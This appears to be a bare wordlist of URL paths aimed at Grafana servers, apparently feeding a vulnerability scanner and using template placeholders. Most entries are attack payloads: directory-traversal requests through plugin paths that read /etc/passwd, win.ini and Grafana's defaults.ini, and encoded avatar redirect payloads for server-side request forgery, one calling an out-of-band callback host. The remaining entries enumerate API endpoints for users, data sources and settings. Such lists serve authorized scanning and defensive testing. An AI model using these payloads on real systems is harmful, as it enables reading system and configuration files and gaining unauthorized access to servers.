/api/snapshots
/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
/avatar/test%3fd%3dredirect.rhynorater.com%25253f%253b%252fbp.blogspot.com%252f{{interactsh-url}}
/api/snapshots/:key
/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini
/public/plugins/alertlist/../../../../../conf/defaults.ini
/public/plugins/{{pluginSlug}}/../../../../../../../../../../../../../../../../../../../etc/passwd
/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd
/public/plugins/{{pluginSlug}}/../../../../../conf/defaults.ini
/dashboard/snapshot/:key
/api/search?type=dash-db
/api/dashboards/home
/dashboard
/api/org
/api/users
/api/datasources
/api/frontend/settings
